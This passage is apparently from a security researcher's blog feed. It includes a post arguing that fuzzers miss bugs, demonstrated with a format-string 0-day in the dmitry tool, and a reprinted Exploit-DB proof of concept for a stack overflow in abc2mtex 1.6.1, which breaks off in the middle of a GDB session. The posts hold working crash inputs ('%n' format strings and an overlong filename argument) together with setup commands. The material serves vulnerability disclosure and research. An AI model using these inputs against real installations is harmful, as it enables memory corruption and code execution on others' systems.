<p>I'm no longer seeing requests from Android devices or the MyBlock app, implying either something
has been discontinued, or is no longer using the original custom user agents.</p>
<p>We've also reached the point where FaceID has finally overtaken TouchID. Here's a graphic capturing
the change:</p>
<p><center>
<img alt="Chart" src="https://carteryagemann.com/images/hrb-auth-2018-2020.png">
</center></p>
<p>We'll see next year how the trends change. Thanks for reading!</p>Fuzzers Suck: New 0-Day Shows We Need To Do Better2020-06-18T11:50:00-04:002020-06-18T11:50:00-04:00Carter Yagemanntag:carteryagemann.com,2020-06-18:/fuzzer-suck-we-need-to-do-better.html<p><a href="https://en.wikipedia.org/wiki/Fuzzing">Fuzz testing</a> (more commonly known as "fuzzing")
has become a predominate technique for bug hunting because it's easy to deploy and yields
results. Academic security research is now flooded with papers on the topic — USENIX Security
alone accepted <strong>7</strong> <a href="https://www.usenix.org/conference/usenixsecurity20/fall-accepted-papers">papers</a>
in the 2020 Fall submission cycle — many of which propose …</p><p><a href="https://en.wikipedia.org/wiki/Fuzzing">Fuzz testing</a> (more commonly known as "fuzzing")
has become a predominate technique for bug hunting because it's easy to deploy and yields
results. Academic security research is now flooded with papers on the topic — USENIX Security
alone accepted <strong>7</strong> <a href="https://www.usenix.org/conference/usenixsecurity20/fall-accepted-papers">papers</a>
in the 2020 Fall submission cycle — many of which propose incremental improvements that'll
be obsolete by next year.</p>
<p>Meanwhile, plenty of serious bugs are slipping through our nets. Take a look at this
<a href="https://github.com/jaygreig86/dmitry/issues/3">0-day</a> my team found in a piece of
software from 2016, which is readily available in major Linux distros like
<a href="https://packages.debian.org/buster/dmitry">Debian</a>, <a href="https://packages.ubuntu.com/eoan/dmitry">Ubuntu</a>,
and <a href="https://tools.kali.org/information-gathering/dmitry">Kali</a>:</p>
<div class="highlight"><pre><span></span><code><span class="o">::</span><span class="p">:</span><span class="nx">text</span>
<span class="err">$</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">dmitry</span><span class="w"> </span><span class="s">"%p %p %p %p %p %p"</span>
<span class="nx">Deepmagic</span><span class="w"> </span><span class="nx">Information</span><span class="w"> </span><span class="nx">Gathering</span><span class="w"> </span><span class="nx">Tool</span>
<span class="s">"There be some deep magic going on"</span>
<span class="nx">ERROR</span><span class="p">:</span><span class="w"> </span><span class="nx">Unable</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">locate</span><span class="w"> </span><span class="nx">Host</span><span class="w"> </span><span class="nx">IP</span><span class="w"> </span><span class="kd">addr</span><span class="p">.</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span>
<span class="nx">Continuing</span><span class="w"> </span><span class="nx">with</span><span class="w"> </span><span class="nx">limited</span><span class="w"> </span><span class="nx">modules</span>
<span class="nx">HostIP</span><span class="p">:</span>
<span class="nx">HostName</span><span class="p">:</span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span>
<span class="nx">Gathered</span><span class="w"> </span><span class="nx">Inic</span><span class="o">-</span><span class="nx">whois</span><span class="w"> </span><span class="nx">information</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="mh">0x5598e89e9b47</span><span class="w"> </span><span class="p">(</span><span class="nx">nil</span><span class="p">)</span><span class="w"> </span><span class="p">(</span><span class="nx">nil</span><span class="p">)</span><span class="w"> </span><span class="mh">0x7ffc2f4878e0</span><span class="w"> </span><span class="mh">0x7f721845de80</span><span class="w"> </span><span class="p">(</span><span class="nx">nil</span><span class="p">)</span>
<span class="p">[</span><span class="o">...</span><span class="p">]</span>
</code></pre></div>
<p>This is a textbook example of an externally-controlled format string vulnerability
(<a href="https://cwe.mitre.org/data/definitions/134.html">CWE-134</a>), in a program that's trivial
to fuzz, that others have already found <a href="https://www.exploit-db.com/exploits/41898">vulnerabilities</a> in.
How did such a simple problem go unreported?</p>
<p>The problem is that <strong>fuzzing assumes vulnerabilities will easily trigger crashes</strong>. Unfortunately,
this 0-day demonstrates an entire class of bugs where that isn't the case. If you know what you're
looking for, it's trivial:</p>
<div class="highlight"><pre><span></span><code><span class="o">::</span><span class="p">:</span><span class="nx">text</span>
<span class="err">$</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">dmitry</span><span class="w"> </span><span class="o">-</span><span class="nx">w</span><span class="w"> </span><span class="o">%</span><span class="nx">n</span>
<span class="nx">Deepmagic</span><span class="w"> </span><span class="nx">Information</span><span class="w"> </span><span class="nx">Gathering</span><span class="w"> </span><span class="nx">Tool</span>
<span class="s">"There be some deep magic going on"</span>
<span class="nx">ERROR</span><span class="p">:</span><span class="w"> </span><span class="nx">Unable</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">locate</span><span class="w"> </span><span class="nx">Host</span><span class="w"> </span><span class="nx">IP</span><span class="w"> </span><span class="kd">addr</span><span class="p">.</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="o">%</span><span class="nx">n</span>
<span class="nx">Continuing</span><span class="w"> </span><span class="nx">with</span><span class="w"> </span><span class="nx">limited</span><span class="w"> </span><span class="nx">modules</span>
<span class="nx">HostIP</span><span class="p">:</span>
<span class="nx">HostName</span><span class="p">:</span><span class="o">%</span><span class="nx">n</span>
<span class="nx">Segmentation</span><span class="w"> </span><span class="nx">fault</span>
</code></pre></div>
<p>But for a fuzzer using typical mutation strategies, it's actually quite difficult:</p>
<div class="highlight"><pre><span></span><code>:::<span class="nv">text</span>
<span class="w"> </span><span class="nv">american</span><span class="w"> </span><span class="nv">fuzzy</span><span class="w"> </span><span class="nv">lop</span><span class="w"> </span><span class="mi">2</span>.<span class="mi">52</span><span class="nv">b</span><span class="w"> </span><span class="ss">(</span><span class="nv">wrapper</span><span class="ss">)</span>
┌─<span class="w"> </span><span class="nv">process</span><span class="w"> </span><span class="nv">timing</span><span class="w"> </span>─────────────────────────────────────┬─<span class="w"> </span><span class="nv">overall</span><span class="w"> </span><span class="nv">results</span><span class="w"> </span>─────┐
│<span class="w"> </span><span class="nv">run</span><span class="w"> </span><span class="nv">time</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">days</span>,<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">hrs</span>,<span class="w"> </span><span class="mi">10</span><span class="w"> </span><span class="nv">min</span>,<span class="w"> </span><span class="mi">32</span><span class="w"> </span><span class="nv">sec</span><span class="w"> </span>│<span class="w"> </span><span class="nv">cycles</span><span class="w"> </span><span class="nv">done</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">last</span><span class="w"> </span><span class="nv">new</span><span class="w"> </span><span class="nv">path</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">days</span>,<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">hrs</span>,<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">min</span>,<span class="w"> </span><span class="mi">23</span><span class="w"> </span><span class="nv">sec</span><span class="w"> </span>│<span class="w"> </span><span class="nv">total</span><span class="w"> </span><span class="nv">paths</span><span class="w"> </span>:<span class="w"> </span><span class="mi">31</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">last</span><span class="w"> </span><span class="nv">uniq</span><span class="w"> </span><span class="nv">crash</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">days</span>,<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">hrs</span>,<span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="nv">min</span>,<span class="w"> </span><span class="mi">12</span><span class="w"> </span><span class="nv">sec</span><span class="w"> </span>│<span class="w"> </span><span class="nv">uniq</span><span class="w"> </span><span class="nv">crashes</span><span class="w"> </span>:<span class="w"> </span><span class="mi">2</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">last</span><span class="w"> </span><span class="nv">uniq</span><span class="w"> </span><span class="nv">hang</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">days</span>,<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">hrs</span>,<span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="nv">min</span>,<span class="w"> </span><span class="mi">56</span><span class="w"> </span><span class="nv">sec</span><span class="w"> </span>│<span class="w"> </span><span class="nv">uniq</span><span class="w"> </span><span class="nv">hangs</span><span class="w"> </span>:<span class="w"> </span><span class="mi">4</span><span class="w"> </span>│
├─<span class="w"> </span><span class="nv">cycle</span><span class="w"> </span><span class="nv">progress</span><span class="w"> </span>────────────────────┬─<span class="w"> </span><span class="nv">map</span><span class="w"> </span><span class="nv">coverage</span><span class="w"> </span>─┴───────────────────────┤
│<span class="w"> </span><span class="nv">now</span><span class="w"> </span><span class="nv">processing</span><span class="w"> </span>:<span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="ss">(</span><span class="mi">9</span>.<span class="mi">68</span><span class="o">%</span><span class="ss">)</span><span class="w"> </span>│<span class="w"> </span><span class="nv">map</span><span class="w"> </span><span class="nv">density</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span>.<span class="mi">08</span><span class="o">%</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="mi">0</span>.<span class="mi">24</span><span class="o">%</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">paths</span><span class="w"> </span><span class="nv">timed</span><span class="w"> </span><span class="nv">out</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="ss">(</span><span class="mi">0</span>.<span class="mi">00</span><span class="o">%</span><span class="ss">)</span><span class="w"> </span>│<span class="w"> </span><span class="nv">count</span><span class="w"> </span><span class="nv">coverage</span><span class="w"> </span>:<span class="w"> </span><span class="mi">2</span>.<span class="mi">13</span><span class="w"> </span><span class="nv">bits</span><span class="o">/</span><span class="nv">tuple</span><span class="w"> </span>│
├─<span class="w"> </span><span class="nv">stage</span><span class="w"> </span><span class="nv">progress</span><span class="w"> </span>────────────────────┼─<span class="w"> </span><span class="nv">findings</span><span class="w"> </span><span class="nv">in</span><span class="w"> </span><span class="nv">depth</span><span class="w"> </span>────────────────────┤
│<span class="w"> </span><span class="nv">now</span><span class="w"> </span><span class="nv">trying</span><span class="w"> </span>:<span class="w"> </span><span class="nv">havoc</span><span class="w"> </span>│<span class="w"> </span><span class="nv">favored</span><span class="w"> </span><span class="nv">paths</span><span class="w"> </span>:<span class="w"> </span><span class="mi">13</span><span class="w"> </span><span class="ss">(</span><span class="mi">41</span>.<span class="mi">94</span><span class="o">%</span><span class="ss">)</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">stage</span><span class="w"> </span><span class="nv">execs</span><span class="w"> </span>:<span class="w"> </span><span class="mi">6540</span><span class="o">/</span><span class="mi">24</span>.<span class="mi">6</span><span class="nv">k</span><span class="w"> </span><span class="ss">(</span><span class="mi">26</span>.<span class="mi">61</span><span class="o">%</span><span class="ss">)</span><span class="w"> </span>│<span class="w"> </span><span class="nv">new</span><span class="w"> </span><span class="nv">edges</span><span class="w"> </span><span class="nv">on</span><span class="w"> </span>:<span class="w"> </span><span class="mi">17</span><span class="w"> </span><span class="ss">(</span><span class="mi">54</span>.<span class="mi">84</span><span class="o">%</span><span class="ss">)</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">total</span><span class="w"> </span><span class="nv">execs</span><span class="w"> </span>:<span class="w"> </span><span class="mi">45</span>.<span class="mi">9</span><span class="nv">k</span><span class="w"> </span>│<span class="w"> </span><span class="nv">total</span><span class="w"> </span><span class="nv">crashes</span><span class="w"> </span>:<span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="ss">(</span><span class="mi">2</span><span class="w"> </span><span class="nv">unique</span><span class="ss">)</span><span class="w"> </span>│
│<span class="w"> </span><span class="k">exec</span><span class="w"> </span><span class="nv">speed</span><span class="w"> </span>:<span class="w"> </span><span class="mi">585</span>.<span class="mi">4</span><span class="o">/</span><span class="nv">sec</span><span class="w"> </span>│<span class="w"> </span><span class="nv">total</span><span class="w"> </span><span class="nv">tmouts</span><span class="w"> </span>:<span class="w"> </span><span class="mi">14</span><span class="w"> </span><span class="ss">(</span><span class="mi">4</span><span class="w"> </span><span class="nv">unique</span><span class="ss">)</span><span class="w"> </span>│
├─<span class="w"> </span><span class="nv">fuzzing</span><span class="w"> </span><span class="nv">strategy</span><span class="w"> </span><span class="nv">yields</span><span class="w"> </span>───────────┴───────────────┬─<span class="w"> </span><span class="nv">path</span><span class="w"> </span><span class="nv">geometry</span><span class="w"> </span>────────┤
│<span class="w"> </span><span class="nv">bit</span><span class="w"> </span><span class="nv">flips</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">152</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">148</span>,<span class="w"> </span><span class="mi">1</span><span class="o">/</span><span class="mi">140</span><span class="w"> </span>│<span class="w"> </span><span class="nv">levels</span><span class="w"> </span>:<span class="w"> </span><span class="mi">3</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">byte</span><span class="w"> </span><span class="nv">flips</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">19</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">15</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">7</span><span class="w"> </span>│<span class="w"> </span><span class="nv">pending</span><span class="w"> </span>:<span class="w"> </span><span class="mi">28</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">arithmetics</span><span class="w"> </span>:<span class="w"> </span><span class="mi">5</span><span class="o">/</span><span class="mi">1062</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">75</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">0</span><span class="w"> </span>│<span class="w"> </span><span class="nv">pend</span><span class="w"> </span><span class="nv">fav</span><span class="w"> </span>:<span class="w"> </span><span class="mi">11</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">known</span><span class="w"> </span><span class="nv">ints</span><span class="w"> </span>:<span class="w"> </span><span class="mi">1</span><span class="o">/</span><span class="mi">96</span>,<span class="w"> </span><span class="mi">1</span><span class="o">/</span><span class="mi">420</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">308</span><span class="w"> </span>│<span class="w"> </span><span class="nv">own</span><span class="w"> </span><span class="nv">finds</span><span class="w"> </span>:<span class="w"> </span><span class="mi">30</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">dictionary</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">0</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">0</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">0</span><span class="w"> </span>│<span class="w"> </span><span class="nv">imported</span><span class="w"> </span>:<span class="w"> </span><span class="nv">n</span><span class="o">/</span><span class="nv">a</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">havoc</span><span class="w"> </span>:<span class="w"> </span><span class="mi">18</span><span class="o">/</span><span class="mi">36</span>.<span class="mi">6</span><span class="nv">k</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">0</span><span class="w"> </span>│<span class="w"> </span><span class="nv">stability</span><span class="w"> </span>:<span class="w"> </span><span class="mi">76</span>.<span class="mi">28</span><span class="o">%</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">trim</span><span class="w"> </span>:<span class="w"> </span><span class="mi">5</span>.<span class="mi">00</span><span class="o">%/</span><span class="mi">4</span>,<span class="w"> </span><span class="mi">0</span>.<span class="mi">00</span><span class="o">%</span><span class="w"> </span>├────────────────────────┘
└─────────────────────────────────────────────────────┘<span class="w"> </span>[<span class="nv">cpu001</span>:<span class="w"> </span><span class="mi">38</span><span class="o">%</span>]
</code></pre></div>
<p><strong>Side Note:</strong> For repeatability, this is the wrapper code I hacked together to restrict AFL to fuzzing
a single command line argument:</p>
<div class="highlight"><pre><span></span><code><span class="o">:::</span><span class="n">c</span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdlib.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><string.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><unistd.h></span>
<span class="kt">int</span><span class="w"> </span><span class="n">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">prog</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"./dmitry"</span><span class="p">;</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">flag</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"-w"</span><span class="p">;</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">buf</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">cmd</span><span class="p">[]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="n">prog</span><span class="p">,</span><span class="w"> </span><span class="n">flag</span><span class="p">,</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">};</span>
<span class="w"> </span><span class="kt">FILE</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">;</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">argc</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="n">input</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fopen</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="w"> </span><span class="s">"r"</span><span class="p">);</span>
<span class="w"> </span><span class="n">fgets</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">),</span><span class="w"> </span><span class="n">input</span><span class="p">);</span>
<span class="w"> </span><span class="n">fclose</span><span class="p">(</span><span class="n">input</span><span class="p">);</span>
<span class="w"> </span><span class="n">execv</span><span class="p">(</span><span class="n">prog</span><span class="p">,</span><span class="w"> </span><span class="n">cmd</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>The crashes it did find pertain to <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-7938">CVE-2017-7938</a> — this program is also prone
to stack overflows (oops). Also, <strong>because most fuzzers rely on stack traces to
triage bugs, and these cases completely obliterate the stack, AFL can't tell that
they're the same bug</strong> (double oops).</p>
<p>Okay, that last paragraph was a bit hostile, so allow me to take a few steps back.
I'm not saying fuzzers are completely useless — I'm sure AFL could
find the format string 0-day in a few hours — but I do think fuzzing is overrated.
These tools rely on being very fast, at the cost of also being
very dumb, and we're already seeing the diminishing returns, even as academia turns
fuzzer optimization into an Olympic sport. I suspect these tools will never "become
smart" because smart usually means slow, which is the antithesis of fuzzing. By
calling attention to this trend (thank you for reading this far), I hope researchers
will consider other avenues towards smart bug hunting, as opposed to just making
fuzzing 5% faster, or adding better scaffolding to support kernels and other niche
applications. Those tasks are useful in their own ways, but they leave trivial
0-days like this on the table.</p>
<p>To that end, I'm happy to report that the tool I've been working on for the past
year, based on <a href="https://en.wikipedia.org/wiki/Symbolic_execution">symbolic execution</a>,
is what actually led me to this 0-day, and it did so in a mere 16 seconds. I
look forward to open sourcing the code, but I'm trying to get a paper
published first and it's currently locked in a "major revision" cycle at a top
tier security conference. With any luck, the release will be coming at the beginning
of 2021. No one said research is fast.</p>
<p>Thanks for reading and happy hacking.</p>New CVE Published (CVE-2020-9549)2020-03-02T09:30:00-05:002020-03-02T09:30:00-05:00Carter Yagemanntag:carteryagemann.com,2020-03-02:/cve-2020-9549.html<p>CVE-2020-9549 has been assigned for a vulnerability I found in Pdfresurrect.
The details are available <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9549">here</a>.</p>
<p>This issue is currently being <a href="https://github.com/enferex/pdfresurrect/issues/8">patched</a>.</p>New PoC Published to Exploit-DB (EDB-ID-47254)2019-08-15T23:30:00-04:002019-08-15T23:30:00-04:00Carter Yagemanntag:carteryagemann.com,2019-08-15:/edb-id-47254.html<p>I published a <a href="https://www.exploit-db.com/exploits/47254">PoC for a new vulnerability</a>
in <code>abc2mtex</code> version 1.6.1. This was discovered while testing an analysis
framework I'm developing with my peers at Georgia Tech.</p>
<p>The vulnerability is due to an unsafe <code>strcpy</code> that allows an attacker to
overwrite a return address and achieve arbitrary …</p><p>I published a <a href="https://www.exploit-db.com/exploits/47254">PoC for a new vulnerability</a>
in <code>abc2mtex</code> version 1.6.1. This was discovered while testing an analysis
framework I'm developing with my peers at Georgia Tech.</p>
<p>The vulnerability is due to an unsafe <code>strcpy</code> that allows an attacker to
overwrite a return address and achieve arbitrary
code execution. This is not the first time this program has been found to be
susceptible to buffer overflows (CVE-2004-1257), but the novelty of this PoC
is that exploitation is achieved using a long input filename whereas the previous
CVE relied on providing maliciously crafted data.</p>
<p>Below is a copy of the PoC published to Exploit-DB:</p>
<div class="highlight"><pre><span></span><code><span class="nx">Exploit</span><span class="w"> </span><span class="nx">Title</span><span class="p">:</span><span class="w"> </span><span class="nx">ABC2MTEX</span><span class="w"> </span><span class="m m-Double">1.6.1</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="nx">Command</span><span class="w"> </span><span class="nx">Line</span><span class="w"> </span><span class="nx">Stack</span><span class="w"> </span><span class="nx">Overflow</span>
<span class="nx">Date</span><span class="p">:</span><span class="w"> </span><span class="mi">2019</span><span class="o">-</span><span class="mi">08</span><span class="o">-</span><span class="mi">13</span>
<span class="nx">Exploit</span><span class="w"> </span><span class="nx">Author</span><span class="p">:</span><span class="w"> </span><span class="nx">Carter</span><span class="w"> </span><span class="nx">Yagemann</span><span class="w"> </span><span class="p"><</span><span class="nx">yagemann</span><span class="err">@</span><span class="nx">gatech</span><span class="p">.</span><span class="nx">edu</span><span class="p">></span>
<span class="nx">Vendor</span><span class="w"> </span><span class="nx">Homepage</span><span class="p">:</span><span class="w"> </span><span class="nx">https</span><span class="p">:</span><span class="c1">//abcnotation.com/abc2mtex/</span>
<span class="nx">Software</span><span class="w"> </span><span class="nx">Link</span><span class="p">:</span><span class="w"> </span><span class="nx">https</span><span class="p">:</span><span class="c1">//github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz</span>
<span class="nx">Version</span><span class="p">:</span><span class="w"> </span><span class="m m-Double">1.6.1</span>
<span class="nx">Tested</span><span class="w"> </span><span class="nx">on</span><span class="p">:</span><span class="w"> </span><span class="nx">Debian</span><span class="w"> </span><span class="nx">Buster</span>
<span class="nx">An</span><span class="w"> </span><span class="nx">unsafe</span><span class="w"> </span><span class="nx">strcpy</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">241</span><span class="w"> </span><span class="nx">allows</span><span class="w"> </span><span class="nx">an</span><span class="w"> </span><span class="nx">attacker</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">overwrite</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="k">return</span>
<span class="nx">address</span><span class="w"> </span><span class="nx">from</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">openIn</span><span class="w"> </span><span class="nx">function</span><span class="w"> </span><span class="nx">by</span><span class="w"> </span><span class="nx">providing</span><span class="w"> </span><span class="nx">a</span><span class="w"> </span><span class="nx">long</span><span class="w"> </span><span class="nx">input</span><span class="w"> </span><span class="nx">filename</span><span class="p">.</span><span class="w"> </span><span class="nx">This</span>
<span class="nx">carries</span><span class="w"> </span><span class="nx">similar</span><span class="w"> </span><span class="nx">risk</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">CVE</span><span class="o">-</span><span class="mi">2004</span><span class="o">-</span><span class="mi">1257</span><span class="p">.</span>
<span class="nx">Setup</span><span class="p">:</span>
<span class="err">$</span><span class="w"> </span><span class="nx">wget</span><span class="w"> </span><span class="nx">https</span><span class="p">:</span><span class="c1">//github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz</span>
<span class="err">$</span><span class="w"> </span><span class="nx">tar</span><span class="w"> </span><span class="o">-</span><span class="nx">xzf</span><span class="w"> </span><span class="nx">abc2mtex1</span><span class="m m-Double">.6.1</span><span class="p">.</span><span class="nx">tar</span><span class="p">.</span><span class="nx">gz</span>
<span class="err">$</span><span class="w"> </span><span class="nx">make</span>
<span class="err">$</span><span class="w"> </span><span class="nx">gcc</span><span class="w"> </span><span class="o">--</span><span class="nx">version</span>
<span class="nx">gcc</span><span class="w"> </span><span class="p">(</span><span class="nx">Debian</span><span class="w"> </span><span class="m m-Double">8.3.0</span><span class="o">-</span><span class="mi">6</span><span class="p">)</span><span class="w"> </span><span class="m m-Double">8.3.0</span>
<span class="nx">Copyright</span><span class="w"> </span><span class="p">(</span><span class="nx">C</span><span class="p">)</span><span class="w"> </span><span class="mi">2018</span><span class="w"> </span><span class="nx">Free</span><span class="w"> </span><span class="nx">Software</span><span class="w"> </span><span class="nx">Foundation</span><span class="p">,</span><span class="w"> </span><span class="nx">Inc</span><span class="p">.</span>
<span class="nx">This</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="nx">free</span><span class="w"> </span><span class="nx">software</span><span class="p">;</span><span class="w"> </span><span class="nx">see</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">source</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="nx">copying</span><span class="w"> </span><span class="nx">conditions</span><span class="p">.</span><span class="w"> </span><span class="nx">There</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="nx">NO</span>
<span class="nx">warranty</span><span class="p">;</span><span class="w"> </span><span class="k">not</span><span class="w"> </span><span class="nx">even</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="nx">MERCHANTABILITY</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="nx">FITNESS</span><span class="w"> </span><span class="nx">FOR</span><span class="w"> </span><span class="nx">A</span><span class="w"> </span><span class="nx">PARTICULAR</span><span class="w"> </span><span class="nx">PURPOSE</span><span class="p">.</span>
<span class="nx">PoC</span><span class="p">:</span>
<span class="err">$</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">abc2mtex</span><span class="w"> </span><span class="nx">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA</span>
<span class="nx">GDB</span><span class="p">:</span>
<span class="nx">We</span><span class="err">'</span><span class="nx">re</span><span class="w"> </span><span class="nx">going</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">place</span><span class="w"> </span><span class="nx">a</span><span class="w"> </span><span class="nx">breakpoint</span><span class="w"> </span><span class="nx">before</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="nx">after</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">241</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">show</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">overflow</span><span class="p">.</span>
<span class="err">$</span><span class="w"> </span><span class="nx">gdb</span><span class="w"> </span><span class="o">-</span><span class="nx">q</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">abc2mtex</span>
<span class="nx">Reading</span><span class="w"> </span><span class="nx">symbols</span><span class="w"> </span><span class="nx">from</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">abc2mtex</span><span class="o">...</span><span class="nx">done</span><span class="p">.</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span><span class="w"> </span><span class="k">break</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">241</span>
<span class="nx">Breakpoint</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="mh">0x4139</span><span class="p">:</span><span class="w"> </span><span class="nx">file</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">,</span><span class="w"> </span><span class="nx">line</span><span class="w"> </span><span class="mi">241</span><span class="p">.</span>
